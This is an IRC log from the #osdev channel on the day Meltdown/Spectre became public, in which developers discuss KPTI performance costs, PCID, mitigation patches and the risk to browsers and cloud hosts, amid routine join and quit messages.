19:34:22 <__pycache__> geist: pti=off iirc
19:34:26 <geist> a CONFIG option too
19:34:26 <__pycache__> at kernel cmdline
19:34:34 <__pycache__> oh?
19:35:05 <geist> it's also unclear to me how bad the performance hit is for earlier cpus, like sandy bridge or so
19:35:09 <geist> that dont have PCID
19:35:33 <__pycache__> geist: should it be worse or better?
19:35:39 <Kazinsal> Worse
19:35:46 <__pycache__> rip
19:35:46 <Kazinsal> PCID reduces the hit by about half
19:36:21 <__pycache__> would KPTI be safe to disable on an intel core i7-4790 processor which I use for browsing the web, compiling, sshing and the occasional steam on linux?
19:37:03 <geist> maybe, but then why do it?
19:37:08 <Kazinsal> We don't have any concrete numbers for the performance hits on anything earlier than Broadwell-E and nothing for AMD sadly
19:37:10 <Mutabah> __pycache__: No*
19:37:15 <Kazinsal> I wouldn't say it's safe to disable KPTI
19:37:20 <geist> none of what you're talking about there actually would be much affected by KPTI anyway
19:37:37 <Kazinsal> Because you know the day that the PoC goes public someone's going to inject it into some bad ads
19:38:00 --- quit: navidr (Quit: Connection closed for inactivity)
19:38:04 <geist> Ads Gone Bad!
19:39:45 <_mjg> have you seen what they propose for another vuln?
19:39:51 <__pycache__> Mutabah: what's the *
19:40:06 <Mutabah> well... depends on how much you trust the websites you visit :)
19:40:09 <_mjg> https://lkml.org/lkml/2018/1/3/780
19:40:09 <Kazinsal> A pointer to no!
19:40:09 <bslsk05> ​lkml.org: LKML: Andi Kleen: Avoid speculative indirect calls in kernel
19:40:28 <Mutabah> And tbh, I haven't grasped the full extent of all of these vulns yet
19:40:43 <Mutabah> I don't know if KPTI has anything to do with what javascript can do
19:41:47 --- nick: heddwch -> spartacus
19:42:00 --- join: unixpickle (~alex@2601:645:8103:60b6:fca3:1b63:480e:59aa) joined #osdev
19:43:08 <__pycache__> if JS can trick the VM for reading the cache lines somehow maybe
19:43:16 <__pycache__> then it'd be a VM exploit
19:43:20 --- quit: uvgroovy (Ping timeout: 265 seconds)
19:43:27 --- nick: spartacus -> heddwch
19:46:02 --- join: Phanes (~Phanes@phanes.silogroup.org) joined #osdev
19:46:02 --- quit: Phanes (Changing host)
19:46:02 --- join: Phanes (~Phanes@surro/founder/phanes) joined #osdev
19:49:35 --- quit: Phanes (K-Lined)
19:56:22 <__pycache__> mozilla claims in a blog post that "web technologies" can trigger this
19:56:25 <__pycache__> oops!
20:04:11 --- quit: zng (Ping timeout: 268 seconds)
20:05:30 <pictron> anyone here know how to get the location of the kernel in a process' space on a linux kernel *without* KASLR?
20:05:48 <Mutabah> Usually hard-coded
20:10:11 <_mjg> see /boot/System.map*
20:23:28 <raphaelsc> also /proc/kallsyms
20:24:25 <raphaelsc> i found a program that stresses meltdown but still unable to find data in L1 cache, apparently. Maybe I'm unable to read it.
20:28:36 <raphaelsc> Mutabah: it's about unmapping most of the kernel from userspace page tables
20:28:37 * Mutabah is away (Lunchtime)
20:29:06 --- join: variable (~variable@freebsd/developer/variable) joined #osdev
20:29:29 <raphaelsc> Mutabah: so syscall heavy apps will find a huge perf degradation given that ring 0 -> 3 switch now requires switching page table which involves TLB flush
20:29:45 <geist> not necessarily. depends on if you have PCID feature or not
20:29:52 <geist> which is approximately Haswell and above
20:29:59 <geist> that mitigates the cost a bit
20:30:03 --- nick: promach__ -> promach_
20:30:21 <_mjg> wait for the other mitigation
20:30:48 <_mjg> if both the kernel and all userspace gets recompiled with an equivalent of https://lkml.org/lkml/2018/1/3/780
20:31:11 <_mjg> i would say it's going to be bad
20:32:10 <raphaelsc> geist: thanks for the explanation
20:33:52 --- quit: Darmor (Quit: Leaving)
20:34:54 <raphaelsc> geist: https://gist.github.com/dougallj/f9ffd7e37db35ee953729491cfb71392
20:34:56 <bslsk05> ​gist.github.com: x86-64 Speculative Execution Harness · GitHub
20:42:39 <variable> _mjg: now you're stalking me here too
20:43:25 <_mjg> i'm reasonably certain i was here first
20:43:31 <variable> _mjg: geist: I wonder if might just be faster to run off specualtive execution
20:43:42 <variable> if that's even possible
20:43:50 <variable> also, I wonder how fixable this is with microcode updates
20:46:18 <geist> dunno
20:47:36 --- join: sprocklem (~sprocklem@unaffiliated/sprocklem) joined #osdev
20:47:40 <_mjg> well the question is how it would impact prefetching
20:51:12 <geist> guess it depends on what the fix would be
20:52:03 <_mjg> so now that the attackers provided a write up, i would really like to hear what hardware people have to say
20:52:21 <_mjg> even while not revealing anything secret there should be a lot to say
20:53:31 --- quit: pictron (Ping timeout: 268 seconds)
20:54:30 <bcos> _mjg: I'd assume hardware vendors are going to say "give us $$ to upgrade to our latest and greatest CPU (that we think is fixed now)"
20:55:34 * bcos is thinking about buying shares in Intel while the prices are at their lowest...
20:59:20 <raphaelsc> guest was never been able to access host's memory even speculatively, right? I do not see how kernel memory isolation in a host can change anything in a guest.
20:59:51 <raphaelsc> i wonder how meltdown will actually effect cloud providers
20:59:51 <variable> bcos: ++
21:00:45 <raphaelsc> s/effect/affect
21:03:22 --- join: oaken-source (~oaken-sou@p3E9D3430.dip0.t-ipconnect.de) joined #osdev
21:03:23 --- quit: Belxjander (Ping timeout: 268 seconds)
21:04:20 --- quit: quc (Ping timeout: 240 seconds)
21:04:28 --- quit: awang_ (Ping timeout: 260 seconds)
21:05:26 --- join: Belxjander (~Belxjande@sourcemage/Mage/Abh-Elementalist) joined #osdev
21:07:30 --- join: osa1 (~omer@213.14.66.114) joined #osdev
21:07:30 --- quit: osa1 (Changing host)
21:07:30 --- join: osa1 (~omer@haskell/developer/osa1) joined #osdev
21:10:17 --- join: quc (~quc@host-89-230-164-119.dynamic.mm.pl) joined #osdev
21:13:49 --- quit: raiz (Quit: rebooting...)
21:17:52 --- join: raiz (~raiz@fardan.info) joined #osdev
21:22:53 --- join: zwliew (uid161395@gateway/web/irccloud.com/x-skfnbbbnkvfbhixs) joined #osdev
21:26:38 --- quit: Belxjander (Ping timeout: 260 seconds)
21:28:58 --- join: Belxjander (~Belxjande@sourcemage/Mage/Abh-Elementalist) joined #osdev
21:40:03 --- quit: quc (Remote host closed the connection)
21:40:19 --- join: quc (~quc@host-89-230-164-119.dynamic.mm.pl) joined #osdev
21:45:13 --- quit: srjek (Ping timeout: 252 seconds)
21:46:00 --- join: eremitah_ (~int@unaffiliated/eremitah) joined #osdev
21:47:02 --- quit: freakazoid0223 (Quit: Call me a relic, call me what you will. Say I'm old fashioned, say I'm over the hill.)
21:47:06 --- quit: eremitah (Ping timeout: 256 seconds)
21:47:06 --- nick: eremitah_ -> eremitah
21:48:58 --- quit: Belxjander (Ping timeout: 240 seconds)
21:55:33 --- join: Belxjander (~Belxjande@sourcemage/Mage/Abh-Elementalist) joined #osdev
22:05:22 --- quit: unixpickle (Quit: My MacBook has gone to sleep. ZZZzzz…)
22:06:25 --- quit: Humble (Ping timeout: 265 seconds)
22:06:41 --- join: xenos1984 (~xenos1984@2001:bb8:2002:200:6651:6ff:fe53:a120) joined #osdev
22:10:30 --- quit: aosfields_ (Ping timeout: 248 seconds)
22:12:06 --- quit: variable (Quit: Found 1 in /dev/zero)
22:17:50 --- join: Humble (~hchiramm@2405:204:d287:4ff8:cfc7:2654:a737:6fff) joined #osdev
22:21:44 --- quit: Belxjander (Ping timeout: 248 seconds)
22:24:32 --- join: Belxjander (~Belxjande@sourcemage/Mage/Abh-Elementalist) joined #osdev
22:28:06 --- quit: oaken-source (Ping timeout: 248 seconds)
22:35:36 --- quit: Belxjander (Ping timeout: 248 seconds)
22:36:33 --- join: Belxjander (~Belxjande@sourcemage/Mage/Abh-Elementalist) joined #osdev
22:43:30 --- quit: xiphias (Remote host closed the connection)
22:45:58 --- quit: Belxjander (Ping timeout: 260 seconds)
22:48:03 --- join: Belxjander (~Belxjande@sourcemage/Mage/Abh-Elementalist) joined #osdev
22:53:51 --- quit: wcstok (Read error: Connection reset by peer)
22:58:00 --- quit: empy (Ping timeout: 248 seconds)
22:58:50 --- join: empy (~l@c-24-56-245-159.customer.broadstripe.net) joined #osdev
22:58:50 --- quit: empy (Changing host)
22:58:50 --- join: empy (~l@unaffiliated/vlrvc2vy) joined #osdev
23:00:01 --- join: oaken-source (~oaken-sou@141.89.226.146) joined #osdev
23:02:06 --- quit: Burgundy (Read error: Connection reset by peer)
23:08:42 --- quit: dbittman (Ping timeout: 276 seconds)
23:15:34 --- quit: Humble (Ping timeout: 240 seconds)
23:29:37 --- join: Humble (~hchiramm@2405:204:d409:4aee:ed60:203d:492d:7ad3) joined #osdev
23:29:58 --- quit: Belxjander (Ping timeout: 248 seconds)
23:36:38 --- join: Belxjander (~Belxjande@sourcemage/Mage/Abh-Elementalist) joined #osdev
23:38:15 --- join: bm371613 (~bartek@2a02:a317:603f:9800:391:ed9f:1c09:1285) joined #osdev
23:39:31 --- join: nzoueidi (~nzoueidi@ubuntu/member/na3il) joined #osdev
23:55:58 --- quit: Belxjander (Ping timeout: 260 seconds)
23:59:59 --- log: ended osdev/18.01.03